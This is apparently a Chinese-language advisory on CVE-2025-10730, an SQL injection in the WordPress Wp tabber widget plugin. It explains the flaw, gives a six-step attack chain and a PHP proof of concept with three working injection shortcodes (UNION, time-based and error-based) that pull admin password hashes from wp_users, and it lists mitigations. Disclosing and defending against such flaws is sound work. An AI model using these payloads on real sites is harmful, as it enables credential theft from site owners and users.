CVE-2025-10730 WordPress Wp tabber widget插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-10730

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Wp tabber widget 插件

漏洞概述

CVE-2025-10730是WordPress Wp tabber widget插件中存在的一个SQL注入漏洞。该漏洞影响该插件所有版本，最高至4.0版本（含）。该漏洞由WordFence安全团队的安全研究员发现并报告。

Wp tabber widget是一款用于WordPress的标签页小工具插件，允许用户在文章或页面中通过短代码（shortcode）展示标签式的内容展示效果。然而，该插件在处理用户通过短代码传入的参数时，未对参数进行充分的转义处理，也未对SQL查询进行充分的预处理（如使用参数化查询或预编译语句），导致攻击者可以通过精心构造的恶意参数向现有SQL查询中注入额外的SQL语句。

该漏洞的CVSS 3.1评分为6.5，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要低权限认证（PR:L），无需用户交互（UI:N）。该漏洞对机密性影响为高（C:H），对完整性和可用性无影响。这意味着攻击者可以利用此漏洞从数据库中提取敏感信息，如用户凭证、个人数据等，但无法修改或破坏数据库内容。

由于该漏洞需要Contributor级别及以上的认证权限才能利用，因此攻击者需要先拥有一个有效的WordPress账户。但考虑到许多WordPress网站允许用户注册或存在弱凭证情况，这一限制条件并不能完全阻止攻击行为。

技术细节

该漏洞位于Wp tabber widget插件的短代码处理逻辑中，具体在wp-tabber-widget.php文件的第51行附近。

漏洞原理：
插件注册了一个名为'wp-tabber-widget'的短代码（shortcode），当WordPress解析包含该短代码的内容时，会调用相应的处理函数。在处理过程中，插件将用户通过短代码属性传入的参数直接拼接到SQL查询语句中，而没有使用WordPress推荐的wpdb::prepare()函数进行参数化查询，也没有对用户输入进行适当的转义处理（如esc_sql()或wpdb::escape()）。

利用方式：
1. 攻击者首先需要拥有一个Contributor级别或以上的WordPress账户；
2. 攻击者创建一篇新的文章或页面，在内容中插入恶意的'wp-tabber-widget'短代码；
3. 在短代码的属性中注入恶意的SQL片段，例如通过UNION SELECT语句或基于时间的盲注语句；
4. 当管理员或其他用户预览或查看该文章时，恶意SQL查询将在数据库中执行；
5. 攻击者通过SQL注入可以提取数据库中的敏感信息，包括wp_users表中的用户名和密码哈希等。

由于该漏洞是基于时间的盲注或UNION注入，攻击者可以通过构造特定的SQL语句来逐步提取数据库中的数据，而无需直接修改数据库内容。

攻击链分析

STEP 1

步骤1：获取认证账户

攻击者需要获取一个WordPress网站的Contributor级别或以上的账户。这可以通过注册新账户（如果网站开放注册）、购买凭证或利用其他漏洞获取。

STEP 2

步骤2：登录WordPress后台

使用获取的账户凭证登录WordPress管理后台。

STEP 3

步骤3：创建恶意内容

创建新的文章或页面，在内容中插入精心构造的'wp-tabber-widget'短代码，短代码属性中包含恶意SQL注入payload。

STEP 4

步骤4：提交或发布内容

将包含恶意短代码的文章提交审核或直接发布，使恶意内容进入系统。

STEP 5

步骤5：触发SQL注入

当管理员或其他用户查看该文章时，插件处理短代码时执行恶意SQL查询，从数据库中提取敏感信息。

STEP 6

步骤6：数据提取

通过UNION注入或盲注技术，逐步提取数据库中的敏感信息，如管理员用户名、密码哈希等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-10730 - WordPress Wp tabber widget SQL Injection PoC
 * Vulnerability: SQL Injection via 'wp-tabber-widget' shortcode
 * Affected: All versions up to and including 4.0
 * Required: Contributor-level access or above
 */

// PoC: Malicious shortcode to be inserted into a WordPress post/page content
// The vulnerable parameter is passed via shortcode attributes and concatenated
// directly into SQL query without proper escaping or prepared statements.

// Example 1: UNION-based SQL Injection to extract admin password hash
$malicious_shortcode_1 = '[wp-tabber-widget id="1 UNION SELECT user_login, user_pass, user_email FROM wp_users WHERE ID=1-- "]';

// Example 2: Time-based blind SQL Injection
$malicious_shortcode_2 = '[wp-tabber-widget id="1 AND (SELECT SLEEP(5))-- "]';

// Example 3: Error-based SQL Injection
$malicious_shortcode_3 = '[wp-tabber-widget id="1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1)))-- "]';

// Exploitation Steps:
// 1. Login as Contributor or higher level user
// 2. Create a new Post or Page
// 3. Insert one of the above malicious shortcodes into the content
// 4. Submit for review or publish the post
// 5. When the post is viewed, the injected SQL query executes
// 6. Extract sensitive data from the database

echo "Insert the following shortcode into a WordPress post:\n";
echo $malicious_shortcode_1 . "\n\n";
echo $malicious_shortcode_2 . "\n\n";
echo $malicious_shortcode_3 . "\n";
?>

影响范围

Wp tabber widget < 4.0

Wp tabber widget <= 4.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）暂时停用Wp tabber widget插件；2）限制Contributor级别用户创建包含短代码的内容；3）在Web服务器层面部署WAF规则，过滤常见的SQL注入payload；4）监控wp_users表和相关敏感表的异常查询活动；5）审查已发布的内容，排查是否存在恶意短代码注入。